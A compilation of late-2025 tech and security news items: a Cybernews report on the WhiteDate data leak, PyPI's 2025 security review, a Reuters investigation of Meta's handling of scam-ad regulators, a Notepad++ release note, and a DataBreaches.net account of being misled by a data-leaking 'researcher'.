cybernews.com
Ernestas Naprys
Senior Journalist
Published: 2 January 2026
An investigative journalist has infiltrated the white supremacist dating website WhiteDate and exfiltrated over 8,000 profiles and 100GB of data. Photos and other sensitive details have been made public, and the full “WhiteLeaks” data is available to journalists and researchers on DDoSecrets.
An “old-school anarchist researcher,” who goes by the online pseudonym Martha Root, claims to have breached a racist dating site and two similar platforms.
The leak affects WhiteDate, a white supremacist dating site for “Europids seeking tribal love,” WhiteChild, a white supremacist site focused on family and ancestry, and WhiteDeal, a networking and professional development site for people with a racist worldview.
All three platforms were operated by a right-wing extremist from Germany.
“I infiltrated a racist dating site and made nazis fall in love with robots,” Root claims.
The journalist found that websites’ cybersecurity hygiene was so poor that it “would make even your grandma’s AOL account blush.”
“Imagine calling yourselves the ‘master race’ but forgetting to secure your own website – maybe try mastering to host WordPress before world domination.”
What data was exposed?
The researcher created a website okstupid.lol, where 8,000 leaked profiles are placed on the map, exposing users from very different regions of the world.
he data includes highly sensitive and detailed self-reported information, such as usernames, gender, age, location, activity history, lifestyle, height, eye color, hair color, and other physical appearance traits, income range, education, marital status, religion, and even self-assessed IQ, among many other fields.
Notably, the dataset also contains numerous profile photos, along with embedded EXIF metadata that reveals precise GPS coordinates, device information, timestamps, and other identifying details.
The researcher claims that image metadata “practically hands out home addresses.”
“Would like to find a woman who understands the value of nation and race, seeks the truth,” one of the exposed profiles reads.
whitedate-exposed-acc2
Root claims that the platform’s gender ratio “makes the Smurf village look like a feminist utopia” – the site is overwhelmingly male.
“For now,” the emails and private messages haven’t been publicly exposed. However, the dataset, dubbed “WhiteLeaks,” has been made available to researchers and journalists on Distributed Denial of Secrets (DDoSecrets), a nonprofit whistleblower site.
The researcher also disclosed that the entire operation was run by a Paris-based company called Horn & Partners, and they identified the woman behind the company.
Investigative journalists and Root presented the data and findings at the 39th Chaos Communications Congress in Germany.
“Martha is whatever the antifascist movement needs at the moment: a ghost in their servers, a thorn in their mythologies, and an intelligence that refuses obedience,” the researcher’s bio on the site reads.
blog.pypi.org
Dustin Ingram, on behalf of the PyPI team.
A look back at the major changes to PyPI in 2025 and related statistics.
As 2025 comes to a close, it's time to look back at another busy year for the Python Package Index. This year, we've focused on delivering critical security enhancements, rolling out powerful new features for organizations, improving the overall user experience for the millions of developers who rely on PyPI every day, and responding to a number of security incidents with transparency.
But first, let's look at some numbers that illustrate the sheer scale of PyPI in 2025:
More than 3.9 million new files published
More than 130,000 new projects created
1.92 exabytes of total data transferred
2.56 trillion total requests served
81,000 requests per second on average
These numbers are a testament to the continued growth and vibrancy of the Python community.
Let's dive into some of the key improvements we've made to PyPI this year.
Security First, Security Always
Security is our top priority, and in 2025 we've shipped a number of features to make PyPI more secure than ever.
Enhanced Two-Factor Authentication (2FA) for Phishing Resistance
We've made significant improvements to our 2FA implementation, starting with email verification for TOTP-based logins. This adds an extra layer of security to your account by requiring you to confirm your login from a trusted device, when using a phishable 2FA method like TOTP.
Since rolling out these changes, we've seen:
more than 52% of active users with non-phishable 2FA enabled
more than 45,000 total unique verified logins
Trusted Publishing and Attestations
Trusted publishing continues to be a cornerstone of our security strategy. This year, we've expanded support to include GitLab Self-Managed instances, allowing maintainers to automate their release process without needing to manage long-lived API tokens. We've also introduced support for custom OIDC issuers for organizations, giving companies more control over their publishing pipelines.
Adoption of trusted publishing has been fantastic:
more than 50,000 projects are now using trusted publishing
more than 20% of all file uploads to PyPI in the last year were done via trusted publishers
We've also been hard at work on attestations, a security feature that allows publishers to make verifiable claims about their software. We've added support for attestations from all Trusted Publishing providers, and we're excited to see how the community uses this feature to improve the security of the software supply chain.
17% of all uploads to PyPI in the last year that included an attestation.
Proactive Security Measures
Beyond user-facing features, we've also implemented a number of proactive security measures to protect the registry from attack. These include:
Phishing Protection: To combat the ongoing threat of phishing attacks, PyPI now detects and warns users about untrusted domains.
Improved ZIP file security: We've hardened our upload pipeline to prevent a class of attacks involving malicious ZIP files.
Typosquatting detection: PyPI now automatically detects and flags potential typosquatting attempts during project creation.
Domain Resurrection Prevention: We now periodically check for expired domains to prevent domain resurrection attacks.
Spam Prevention: We've taken action against spam campaigns, including prohibiting registrations from specific domains that were a source of abuse.
Transparency and Incident Response
This year, we've also focused on providing transparent and timely information about security incidents affecting PyPI. We've published detailed incident reports on a number of events, including:
An issue with privileges persisting in organization teams.
A widespread phishing attack targeting PyPI users.
A token exfiltration campaign via GitHub Actions workflows.
The potential implications of the "Shai-Hulud" attack on the npm ecosystem.
We believe that transparency is key to building and maintaining trust with our community, and we'll continue to provide these reports as needed.
Safety and Support Requests
This year, our safety & support team and administrators have been working diligently to address user requests and combat malware to maintain a healthy ecosystem. We're proud to report significant progress in handling various types of support inquiries and improving our malware response.
Malware Response
We've continued to improve our malware detection and response capabilities. This year, we've processed more than 2000 malware reports. This is a testament to the vigilance of our community and the dedication of our administrators.
Our goal is to reduce the time it takes to remove malware from PyPI, and we're happy to report that we're making significant progress: in the last year, 66% of all reports were handled within 4 hours, climbing to 92% within 24 hours, with only a few more complex issues reaching the maximum of 4 days to remediate.
Support Requests
Our support team has also been hard at work making sure our users can continue to be effective on PyPI. This year, we've successfully resolved 2221 individual account recovery requests.
We've also handled more than 500 project name retention sequests (PEP 541). This includes an average first triage time less than 1 week. This is a significant improvement compared to the previous 9-month backlog, and we're happy to report that the backlog is current for the month of December.
Organizations Growth
One of our biggest announcements in previous years was the general availability of organizations on PyPI. Organizations provide a way for companies and community projects to manage their packages, teams, and billing in a centralized location.
We have continued to see growing usage of organizations:
7,742 of organizations have been created on PyPI
9,059 projects are now managed by organizations
We've been hard at work adding new features to organizations, including team management, project transfers, and a comprehensive admin interface. We're excited to see organizations use these features to use PyPI more effectively.
A Better PyPI for Everyone
Finally, we've made a number of improvements to the overall maintainer experience on PyPI. These include:
Project Lifecycle Management: You can now archive your projects to signal that they are no longer actively maintained. This is part of a larger effort to standardize project status markers as proposed in PEP 792.
New Terms of Service: We've introduced a new Terms of Service to formalize our policies and enable new features like organizations.
Looking Ahead to 2026
We're proud of the progress we've made in 2025, but we know there's always more to do. In 2026, we'll continue to focus on improving the security, stability, and usability of PyPI for the entire Python community.
Acknowledgements
As always, a huge thanks to our sponsors who make the scale and reliability of PyPI possible, and a special shout-out to Fastly for being a critical infrastructure donor.
We'd also like to extend a special thank you to a few individuals who made significant contributions to PyPI this year. Thank you to William Woodruff, Facundo Tuesca, and Seth Michael Larson for your work on trusted publishing, attestations, project archival, zipfile mitigation, and other security features.
Finally, PyPI wouldn't be what it is today without the countless hours of work from our community. A huge thank you to everyone who contributed code, opened an issue, or provided feedback this year. As always, we're grateful for the contributions of our community, whether it's through code, documentation, or feedback. PyPI wouldn't be what it is today without you.
Here's to a great 2026!
| Reuters reuters.com
By Jeff Horwitz
December 31, 20252:00 PM GMT+1
A Reuters investigation examines its tactics, including efforts to make scam ads “not findable” when authorities search for them.
As regulators press Meta to crack down on rogue advertisers on Facebook and Instagram, the social media giant has drafted a “playbook” to stall them. Internal documents seen by Reuters reveal its tactics, including efforts to make scam ads “not findable” when authorities search for them.
SAN FRANCISCO - Japanese regulators last year were upset by a flood of ads for obvious scams on Facebook and Instagram. The scams ranged from fraudulent investment schemes to fake celebrity product endorsements created by artificial intelligence.
Meta, owner of the two social media platforms, feared Japan would soon force it to verify the identity of all its advertisers, internal documents reviewed by Reuters show. The step would likely reduce fraud but also cost the company revenue.
To head off that threat, Meta launched an enforcement blitz to reduce the volume of offending ads. But it also sought to make problematic ads less “discoverable” for Japanese regulators, the documents show.
The documents are part of an internal cache of materials from the past four years in which Meta employees assessed the fast-growing level of fraudulent advertising across its platforms worldwide. Drawn from multiple sources and authored by employees in departments including finance, legal, public policy and safety, the documents also reveal ways that Meta, to protect billions of dollars in ad revenue, has resisted efforts by governments to crack down.
In this case, Meta’s remedy hinged on its “Ad Library,” a publicly searchable database where users can look up Facebook and Instagram ads using keywords. Meta built the library as a transparency tool, and the company realized Japanese regulators were searching it as a “simple test” of “Meta’s effectiveness at tackling scams,” one document noted.
To perform better on that test, Meta staffers found a way to manage what they called the “prevalence perception” of scam ads returned by Ad Library searches, the documents show. First, they identified the top keywords and celebrity names that Japanese Ad Library users employed to find the fraud ads. Then they ran identical searches repeatedly, deleting ads that appeared fraudulent from the library and Meta’s platforms.
Instead of telling me an accurate story about ads on Meta’s platforms, it now just tells me a story about Meta trying to give itself a good grade for regulators.
Sandeep Abraham, former Meta fraud investigator
The tactic successfully removed some fraudulent advertising of the sort that regulators would want to weed out. But it also served to make the search results that Meta believed regulators were viewing appear cleaner than they otherwise would have. The scrubbing, Meta teams explained in documents regarding their efforts to reduce scam discoverability, sought to make problematic content “not findable” for “regulators, investigators and journalists.”
Within a few months, they said in one memo after the effort, “we discovered less than 100 ads in the last week, hitting 0 for the last 4 days of the sprint.” The Japanese government also took note, the document added, citing an interview in which a prominent legislator lauded the improvement.
Meta has studied searches of its Ad Library and worked to reduce the "discoverability" of problematic advertising. Documents reviewed by Reuters, and highlighted here by the news agency, show internal discussions about the effort. REUTERS
Meta has studied searches of its Ad Library and worked to reduce the "discoverability" of problematic advertising. Documents reviewed by Reuters, and highlighted here by the news agency, show internal discussions about the effort. REUTERS
“Fraudulent ads are already decreasing,” Takayuki Kobayashi, of the ruling Liberal Democratic Party, told a local media outlet. Kobayashi didn’t respond to a Reuters request for comment about the interview.
Japan didn’t mandate the verification and transparency rules Meta feared. The country’s Ministry of Internal Affairs and Communications declined to comment.
So successful was the search-result cleanup that Meta, the documents show, added the tactic to a “general global playbook” it has deployed against regulatory scrutiny in other markets, including the United States, Europe, India, Australia, Brazil and Thailand. The playbook, as it’s referred to in some of the documents, lays out Meta’s strategy to stall regulators and put off advertiser verification unless new laws leave them no choice.
The search scrubbing, said Sandeep Abraham, a former Meta fraud investigator who now co-runs a cybersecurity consultancy called Risky Business Solutions, amounts to “regulatory theater,” distorting the very transparency the Ad Library purports to provide. “Instead of telling me an accurate story about ads on Meta’s platforms, it now just tells me a story about Meta trying to give itself a good grade for regulators,” said Abraham, who left the company in 2023.
Meta spokesperson Andy Stone in a statement told Reuters there is nothing misleading about removing scam ads from the library. “To suggest otherwise is disingenuous,” Stone said.
By cleaning those ads from search results, the company is also removing them from its systems overall. “Meta teams regularly check the Ad Library to identify scam ads because when fewer scam ads show up there that means there are fewer scam ads on the platform,” Stone wrote.
Advertiser verification, he said, is only one among many measures the company uses to prevent scams. Verification is “not a silver bullet,” Stone wrote, adding that it “works best in concert with other, higher-impact tools.” He disputed that Meta has sought to stall or weaken regulations, and said that the company’s work with regulators is just part of its broader efforts to reduce scams.
Those efforts, Stone continued, have been successful, particularly considering the continuous maneuvers by scammers to get around measures to block them. “The job of chasing them down never ends,” he wrote. The company has set global scam reduction targets, Stone said, and in the past year has seen a 50% decline in user reports of scams. “We set a global baseline and aggressive targets to drive down scam activity in countries where it was greatest, all of which has led to an overall reduction in scams on platform.”
Meta’s internal documents cast new light on the central role played by fraudulent advertising in the social media giant’s business model – and the steps the company takes to safeguard that revenue. Reuters reported in November that scam ads Meta considers “high risk” generate as much as $7 billion in revenue for the company each year. This month, the news agency found that Meta tolerates rampant fraud from advertisers in China.
In response to Reuters’ coverage, two U.S. senators urged regulators at the Securities and Exchange Commission and the Federal Trade Commission to investigate and “pursue vigorous enforcement action where appropriate.” Citing Reuters reporting, the attorney general of the U.S. Virgin Islands also sued Meta this month for allegedly “knowingly and intentionally” exposing users of its platforms to “fraud and harm” and “profiting from scams.” Stone said Meta strongly disagrees with the lawsuit’s allegations.
In Brussels, where European authorities have also been focused on scams, a spokesperson for the European Commission told Reuters its regulators had recently asked Meta for details about its handling of fraudulent advertising. “The Commission has sent a formal request for information to Meta relating to scam ads and risks related to scam ads and how Meta manages these risks,” spokesperson Thomas Regnier wrote. “There are doubts about compliance.” He didn’t elaborate.
The documents reviewed by Reuters show that Meta assigned its handling of scams the top possible score in an internal ranking of regulatory, legal, reputational and financial risks in 2025. One internal analysis calculated that possible regulation in Europe and Britain that would make Meta liable for its users’ scam losses could cost the company as much as $9.3 billion.
EMPLOY A “REACTIVE ONLY” STANCE
One big push among regulators is to get Meta and other social media companies to adopt what is known as universal advertiser verification. The step requires all advertisers to pass an identity check by social media platforms before the platforms will accept their ads. Often, regulators request that some of an advertiser’s identity information also be viewable, allowing users to see whether an ad was posted locally or from the other side of the world.
Google in 2020 announced that it would gradually adopt universal verification, and said earlier this year it has now verified more than 90% of advertisers. Along with requiring verification in jurisdictions where it’s legally mandated, Meta offers to voluntarily verify some large advertisers and sells “Meta Verified” badges to others, combining identity checks with access to customer support staff.
Documents reviewed by Reuters say that 55% of Meta’s advertising revenue came from verified sources last year. Stone, the spokesperson, added that 70% of the company’s revenue now comes from advertisers it considers verified.
The internal company documents show that unverified advertisers are disproportionately responsible for harm on Meta’s platforms. One analysis from 2022 found that 70% of its newly active advertisers were promoting scams, illicit goods or “low quality” products. Stone said that Meta routinely disables such new accounts, “some on the very day that they’re created.”
Meta’s documents also show the company recognizes that universal verification would reduce scam activity. They indicate that Meta could implement the measure in any of the countries where it operates in less than six weeks, should it choose to do so.
But Meta has balked at the cost.
Despite reaping revenue of $164.5 billion last year, almost all of which came from advertising, Meta has decided not to spend the roughly $2 billion it estimates universal verification would cost, the documents show. In addition to that cost of implementation, staffers noted, Meta could ultimately lose up to 4.8% of its total revenue by blocking unverified advertisers.
I expected that the company would have continued to do more verification, and personally felt that was something that all major platforms should be doing.
Rob Leathern, a former senior director of product management at Facebook
Instead of adopting verification, Meta has decided to employ a “reactive only” stance, according to the documents. That means resisting efforts at regulation – through lobbying but also through measures like the scrubbing of Ad Library searches in Japan last year. The reactive stance also means accepting universal verification only if lawmakers mandate it.
So far, just a few markets, including Taiwan and Singapore, have done so.
Even then, the documents show, the financial costs to Meta have remained small. Meta’s own tests showed verification immediately reduced scam ads in those countries by as much as 29%. But much of the lost revenue was recouped because the same blocked ads continued to run in other markets.
If an unverified advertiser is blocked from showing ads in Taiwan, for example, Meta will show those ads more frequently to users elsewhere, creating a whack-a-mole dynamic in which scam ads prohibited in one jurisdiction pop up in another. In the case of blocked ads in Taiwan, “revenue was redistributed/rerouted to the remaining target countries,” one March 2025 document said, adding that consumer injury gets displaced, too. “This would go for harm as well,” the document noted.
Meta analyses found that even when verification blocked ads in one market, those same ads would still generate revenues for the company in other markets. Highlighting of internal document reviewed by Reuters. REUTERS
Meta analyses found that even when verification blocked ads in one market, those same ads would still generate revenues for the company in other markets. Highlighting of internal document reviewed by Reuters. REUTERS
Meta’s documents show the company believes its efforts to defeat regulation are succeeding. In mid-2024, one strategy document called the prospect of being “required to verify all advertisers” worldwide a “black swan,” a term used to describe an improbable but catastrophic event. In the months afterwards, policy staffers boasted about stalling regulations in Europe, Singapore, Britain and elsewhere.
In July, one Meta lobbyist wrote colleagues after they thwarted stricter measures considered by financial regulators in Hong Kong against financial scams. To get ahead of the effort, staffers helped regulators draft a voluntary “anti-scam charter.” They coordinated with Google, which also signed the charter, to present a “united front,” the document says. “Through skillful negotiations with regulators,” the Meta lobbyist wrote, Hong Kong relaxed rules that would have forced verification of financial advertisers. “The finalised language does not introduce new commitments or require additional product development.”
Hong Kong regulators, the lobbyist added, “have shown huge appreciation for Meta’s leading participation.”
Meta regulations screen shot
Meta staffers boasted about success slowing the push by authorities for advertiser verification. In one document, highlighted here by Reuters, Meta employees say their lobbying in Hong Kong thwarted "new commitments" in local regulations. REUTERS
A Google spokesperson said the company signed onto the charter because it believed it would benefit customers. Google participated, he said, of its own accord and as the result of direct engagement with Hong Kong regulators.
In a statement, Hong Kong financial regulators said that “advertiser verification is one of many ways social media platforms can protect the investment public.” They declined to respond to Reuters’ questions about Meta and noted that the regulators involved with the charter don't themselves have the authority to impose advertiser verification requirements.
“All social media platforms should strengthen their efforts to detect and remove fraudulent and unlawful materials,” they added.
“INDUSTRY AND REGULATORY EXPECTATIONS”
Fraud across social media platforms has surged in recent years, fueled by the rise of untraceable cryptocurrency payments, AI ad-generation tools and organized crime syndicates. Mob rings have found the business so lucrative that they employ forced labor to staff well-documented “scam compounds” that generate waves of fraudulent content from southeast Asia. Internally, Meta has cited estimates that such compounds are responsible for $63 billion in annual damage to consumers worldwide.
In some countries, regulators have determined that Meta platforms host more fraudulent content than its online competitors. In February 2024, Singapore police reported that more than 90% of social media fraud victims in the city state had been scammed through Facebook or Instagram. In a statement to Reuters, a spokesperson for Singapore’s Ministry of Home Affairs wrote that “Meta products have persistently been the most common platforms used by scammers.”
“We have repeatedly highlighted our deep concern over the continued prevalence of scams on Meta’s platforms,” the statement continued. After Reuters’ inquiries for this report, it added, Singapore authorities have asked Meta for more information and will broaden existing verification measures, including some mandating the use of facial recognition technology to prevent the impersonation of public figures. “We have reiterated that more needs to be done to secure Meta’s products and protect users from scams, instead of prioritising its profits. We have requested for a formal explanation from Meta and will take enforcement action if Meta is found to be in violation of legal requirements.”
A known weakness in Meta’s defenses is the ease of advertising on its platforms.
To purchase most advertisements, all a client needs is a user account – easily created with an email or phone number and a user-supplied name and birthdate. If Meta doesn’t verify those details, it can’t know who it’s doing business with. Even if an advertiser gets banned, there is nothing to stop it from returning with a new account. A fraudster can merely sign up again.
Meta has known about the problem for years, documents and interviews with former staffers show.
In the 2016 U.S. presidential election, fake political ads flooded Facebook with disinformation. In response, the company took steps to reduce chances that could happen again. Back then, foreign actors seeking to influence the election easily placed ads masquerading as Americans. Some Russian advertisers pretending to be American political activists even paid for such ads in rubles, Meta has said.
Starting in 2018, the company began requiring a valid identity document and a confirmed U.S. address before clients could place political ads. In addition to providing verification for the company itself, the general details, including the name and location of the advertiser, could be viewed by users, too.
Rob Leathern, a former senior director of product management at Facebook who oversaw the effort to verify political advertisers, said the added transparency and accountability led some staffers to believe that Meta would broaden it to all advertisers. “I expected that the company would have continued to do more verification, and personally felt that was something that all major platforms should be doing,” said Leathern, who left the company at the end of 2020.
Meta in 2018 also introduced its Ad Library, an easily searchable database of all ads that run on its platforms. The company, the documents show, expected to generate goodwill with the library, particularly with regards to political advertisements. Competitors, including Google, soon launched ad libraries of their own.
In the years that followed, Meta continued to acknowledge the effectiveness of both transparency and verification. So-called “know your customer policies,” Meta staffers wrote in a November 2024 document, are “commonly understood to be effective at reducing scam-risks.” They noted a competitive component, too, citing Google’s move at the start of the decade to adopt universal verification: “Google’s approach to verify all advertisers is recalibrating industry and regulatory expectations.”
Meta, however, has been reluctant to pay for it.
The internal documents show that last year Meta consulted with a company that works with Google to verify advertisers. Meta officials, according to the documents, wanted to know how much it would cost to follow suit. But the answer – at least $20 per advertiser – proved too costly for their liking, one document said.
The Meta spokesperson said that the company, regardless of cost, didn’t work with the vendor because its verification process took too long.
The potential for lost revenue has also given the company pause.
In addition to lost income from advertisers culled by verification, stricter measures could also cannibalize a paid program through which Meta already charges advertisers for similar status. The program, known as “Verified for Business,” costs clients as much as $349.99 per month and allows businesses to display a badge assuring users that Meta has authenticated their profile. Meta describes the program as more than just basic verification, offering advertisers better customer support and protections against impersonation.
Still, the documents show, Meta managers fear those revenues could shrivel if the company adopts verification for all advertisers.
“WE HAVE AN OPPORTUNITY”
In 2023, because of a sharp rise in ads for investment scams, Taiwan passed legislation ordering social media platforms to begin verifying advertisers of financial products. The self-governing island, population 23 million, is small compared to Meta’s major markets, but the company’s response there helps illustrate how resistant Meta has been to growing regulatory scrutiny worldwide.
In private conversations, the documents show, Taiwanese regulators told Meta it needed to demonstrate it was taking concrete steps to help reduce financial scam ads. When it came to financial fraud, the regulators said, Meta needed to verify the identity of those advertising financial services and respond to reports of fraud within 24 hours.
Meta, according to the documents, told Taiwan it needed more time to comply. Regulators agreed. But Meta, the documents show, in the months that followed didn’t address the problem to the government’s satisfaction.
Frustrated, the Taiwanese regulators last year issued new demands. Now, the new regulations stated, Meta and the owners of other major platforms would have to verify all advertisers. Regulators told Meta it would be fined $180,000 for every unverified scam ad it ran, Meta staffers wrote.
If it didn’t comply, the staffers calculated, the resulting fines would exceed Meta’s total profits in Taiwan. It would be cheaper to abandon the market than to disobey, they concluded.
Meta complied, rushing to verify advertisers ahead of regulators’ deadlines.
In a statement to Reuters, Taiwan’s Ministry of Digital Affairs said stricter regulations over the past year brought down rates of scam ads involving investments by 96% and identity impersonation by 94%. In addition to requiring major social media platforms to verify advertisers, Taiwan has developed its own AI system to scan ads on Meta’s platform, set up a portal for citizens to report fraudulent ads, and established public-private partnerships to detect scams, the ministry added.
Over the course of 2025, the statement said, Taiwan has fined Meta about $590,000 for four violations of the law. The ministry said it “will maintain a close watch on shifting fraud risks.”
The new rules gave Meta the opportunity to study the impact that full verification would have on its business. Before the new regulation, according to internal calculations, about 18% of all Meta advertising in Taiwan, or about $342 million of its annual ad business there, broke at least one of the company’s rules against false advertising or the sale of banned products. Unverified advertisers, one analysis found, produced twice as much problematic advertising as those who submitted verification details.
Their analyses also revealed the whack-a-mole dynamic.
Because scamming is a global business – and Meta’s algorithms allow clients to choose multiple markets in which to advertise – many advertisers seeking to place fraudulent posts do so in more than one geography. Meta experiments showed that while fraudulent ads decreased in Taiwan after the rule change, its algorithms simply rerouted them to users in other markets.
“The implication here is that violating actors that only require verification in one country, will shift their harm to other countries,” one analysis spelled out. Unless advertiser verification was “enforced globally,” staffers wrote, Meta wouldn’t so much be fighting scams as relocating them.
The documents included briefing notes prepared for Chief Executive Mark Zuckerberg about the dynamic. Reuters couldn’t determine whether the Meta boss ever saw the notes or was briefed on their contents. But the message delivered a similar conclusion. It also warned of a complication: If enforcement in one jurisdiction worsened the problem of fraud in others, regulators in the newly impacted markets were likely to crack down, too.
Meta spokesperson Stone said he couldn’t determine whether Zuckerberg received the briefing described in the document reviewed by Reuters.
Faced with the prospect of ever-expanding scrutiny, Meta considered embracing full verification voluntarily, the documents show. The goal, staffers wrote, could enable the company to appear proactive but also set terms and a timeline on its own. “We have an opportunity to set a goal of verifying all advertisers (and communicate our intention to do so externally, in order to better negotiate with lawmakers),” a November 2024 strategy document noted. Meta could “stage the rollout over time and set our own definitions of verification.”
Policy staff even planned to announce the decision during the first half of 2025, the documents show. But for reasons not specified in the documents, they postponed an announcement until the second half of the year and then cancelled it altogether. Leadership had changed its mind, a document noted, without saying why.
“MIMIC WHAT REGULATORS MAY SEARCH FOR”
Instead, Meta began to apply some of the lessons it learned in Japan.
That experience helped the company realize that Tokyo wasn’t the only government using Ad Library searches as a means of tracking online fraud. “Regulators will open up the ads library and show us multiple similar scam ads,” public policy staffers lamented in one 2024 document. Staffers also noted authorities were employing one feature that was proving especially useful: a keyword search. Unlike Google’s version, the Meta library made it easy to find scam ads through searches with terms like “free gift” or “guaranteed profit.”
Managers overseeing a revamp of the Ad Library proposed eventually killing the keyword feature entirely, the documents show. Wary of blowback from regulators, however, Meta decided not to. The Meta spokesperson said Meta is not considering it.
The company did, however, change the library so that searches returned fewer objectionable ads.
One adjustment made searches default to active ads, reducing the number of search results by eliminating content that Meta had already blocked through prior screening. The change made fraudulent ads from the past absent from new search results.
Staffers also made Meta’s systems rerun enforcement measures on all ads that appeared during new Ad Library searches, the documents show. That adjustment gave Meta a second chance to scrap violators that had previously evaded fraud filters.
One of the most useful tactics it learned in Japan was Meta’s mimicry of searches performed by regulators. After repeating the same queries, and deleting problematic results, staffers could eventually go days without finding scam ads, one document shows.
As a result, Meta decided to take the tactic global, performing similar analyses to assess “scam discoverability” in other countries. “We have built a vast keyword list by country that is meant to mimic what regulators may search for,” one document states. Another described the work as changing the “prevalence perception” of scams on Facebook and Instagram.
Meta’s perception-management tools are now part of what the company has referred to as its “general global playbook” for dealing with regulators. The documents reviewed by Reuters repeatedly reference the “playbook” as steps the company should follow in order to slow the push toward verification in any given jurisdiction.
Beginning one year ahead of expected regulation, the playbook advises, Meta should tell the local regulators it will create a voluntary verification process. When doing so, the documents add, Meta should ask those authorities for time to let the voluntary measures play out. To buy yet more time, and further gauge reactions from regulators, Meta after six months should force verification upon “new and risky” advertisers, the playbook continues.
Meta playbook screenshot
Meta has devised a “global playbook,” summarized in the document here, to delay and weaken the push by regulators to mandate advertiser verification. Internal documents reviewed by Reuters show that verification reduces scam ads, but also costs Meta revenue. REUTERS
If ultimately regulators force mandatory verification for all, the playbook states, Meta should once again stall. “Keep engaging with regulator on extension,” one document advises.
The documents show Meta staffers celebrating the success of their efforts to change some perceptions.
In March, industry officials and regulators met for a conference in London organized by the Global Anti-Scam Alliance, a group that organizes regular gatherings to address online fraud. Meta staffers in one document celebrated the lack of scorn heaped on the company compared with previous events.
“There was a drastic shift in tone,” a project manager noted. “Meta was rarely called out whereas previously we were explicitly and repeatedly shamed for lack of action in countering fraud.”
| Notepad++ notepad-plus-plus.org
2025-12-27
Though the version number is major, this release itself is not a major update, and it contains regression-fix & enhancements.
The self-signed certificate is no longer used as of this release. Only the legitimate certificate issued by GlobalSign is now used to sign Notepad++ release binaries. We strongly recommend that users who previously installed the self-signed root certificate remove it.
A log of security errors encountered during Notepad++ updates is now generated automatically. In case the auto-update process stops due to a signature or certificate verification failure - users can check the file located at ”%LOCALAPPDATA%\Notepad++\log\securityError.log” to identify the issue and report it to the Notepad++ issue tracker.
The jarring color regression in dark mode regression introduced in v8.8.9 has also been fixed in this release.
In addition to the security enhancements & the regression-fix mentioned above, this release includes various bug-fixes & several additional enhancements. You can view the full list of improvements for version 8.9 and download it here:
databreaches.net
Posted on December 25, 2025 by Dissent
Over the years, DataBreaches has been contacted by many people with requests for help notifying entities of data leaks or breaches. Some of the people who contact this site are cybercriminals, hoping to put pressure on their victims. Others are researchers who are frustrated by their attempts at responsible disclosure.
When it’s a “blackhat” contacting this site, DataBreaches often responds by seeking more information from them, and may even contact their target to ask for confirmation or a statement about claims that are being made. Usually, DataBreaches does not report on the attack or claims at that time, so as not to add to the pressure the entity might be under to pay some extortion. Occasionally, though, depending on the circumstances and the length of time since the alleged breach, this site may report on an attack that an entity has not yet disclosed, especially if personal information is already being leaked.
Some people have questioned whether I have been too friendly with cybercriminals or a mouthpiece for them. Occasionally, I have even been accused of aiding criminals. I’ve certainly knowingly aided some criminals who have contacted me over the years if they are trying to do the right thing or turn their lives around. And I’ve also helped some cybercriminals in ways I cannot reveal here because it involves off-the-record situations. One person recently referred to me as the “threat actor whisperer.”
The reality is that I talk to most cybercriminals as people and chatting with them gives me greater insights into their motivations and thinking. And, of course, it occasionally gives me tips and exclusives relevant to my reporting.
Do some threat actors lie to me? Undoubtedly. I resent being “played” and I get mad at myself if I have been duped.
The remainder of this post is about a data leak on a few forums involving data from WIRED and Condé Nast and how DataBreaches was “played.”
A Message on Signal
On November 22, a message request appeared on Signal from someone called “Lovely.” The avatar was a cute kitten, and the only message was “Hello.”
DataBreaches’ first thought was that this was a likely scammer, but curiosity prevailed, so I accepted the request. What they wrote next surprised me:
Can you try to get me a security contact at Condé Nast? I emailed them about a serious vulnerability on one of their websites a few days ago but I haven’t received a response ye
“Lovely,” who assured me they were not seeking a bug bounty or any payment, said they were simply trying to inform Condé Nast of a vulnerability that could expose account profiles and enable an attacker to change accounts’ passwords. On inquiry, they claimed they had only downloaded a few profiles as proof of the vulnerability.
“Lovely” showed me screenshots of attempts to inform WIRED and Condé Nast via direct contact with one of their security reporters and someone who claimed to be from their security team.
They also showed me my own registration data from WIRED.com, which was accurate, and the information from a WIRED reporter who also seemingly confirmed his data was also correct.
WIRED account information for DataBreaches that Lovely showed her on November 27. It shows email address and date registered and last updated among the fields.
WIRED account information for DataBreaches that Lovely showed her on November 27. It shows email address and date registered and last updated among the fields.
It all seemed consistent with what they had claimed.
Despite its vast wealth, Condé Nast lacks a security.txt file that explains how to report a vulnerability to them. Nowhere on its site did it plainly explain how to report a vulnerability to them.
Trying to help Condé Nast avoid compromise of what was described to me as a serious vulnerability risking more than 33 million users’ accounts, I reached out to people I know at WIRED. I also reached out to Condé Nast but received no replies from them.
When the “Researcher” Really Is Dishonorable
Weeks of failed attempts to get a response from Condé Nast followed and Lovely started stating that they were getting angry and thinking about leaking a database just to get the firm’s attention. Leaking a database? They had assured me they had only downloaded a few profiles as proof. But now they stated they had downloaded more than 33 million accounts. They wrote:
We downloaded all 33 million user’s information. The data includes email address, name, phone number, physical address, gender, usernames, and more.
The vulnerabilities allow us to
– view the account information of every Condé Nast account
– change any account’s email address and password
They also provided DataBreaches with a list of the json files showing the number of user accounts for each publication. Not all publications had all of the types of information.
DataBreaches reached out to Condé Nast again with that information, but again received no reply. A contact at WIRED was able to get the firm’s security team to engage and Lovely eventually told DataBreaches that they had made contact and given the security team information on six vulnerabilities they had found.
Six? How many lies had Lovely told me? Lovely asked me to hold off on reporting until the firm had time to remediate all the vulnerabilities. DataBreaches agreed, for the firm’s sake, but by now, had no doubts that Lovely had been dishonest and she had been “played.”
Eventually, Lovely sent a message that everything had now been remediated. DataBreaches asked, “Did they pay you anything?” And that’s when Lovely answered, “Not yet.” DataBreaches subsequently discovered that they have been leaking data from WIRED on at least two forums, with a list of all the json files they intend to leak. Or perhaps they intend to sell some of the data. Either way, they lied to this blogger to get her help in reaching Condé Nast.
“Regrets, I’ve Had a Few”
At one point when I reached out on LinkedIn seeking a contact at Condé Nast, someone suggested that Lovely wasn’t a researcher but was a cybercriminal and that I was aiding them.
With the clarity of hindsight, he was right in one respect, although I certainly had no indication of that at the outset or even weeks later. But as I replied to him at the time, “I hope I wasn’t helping a cybercriminal, but if Condé Nast found out about a vulnerability that allowed access to 33M accounts, did I harm Condé Nast by reaching out to them, or did I help them?”
I don’t know if Condé Nast verified Lovely’s claims or not about the alleged vulnerabilities. That said, based on what I had been told, I don’t regret my repeated attempts to get their security team to contact Lovely to get information about the alleged vulnerability.
As for “Lovely,” they played me. Condé Nast should never pay them a dime, and no one else should ever, as their word clearly cannot be trusted.
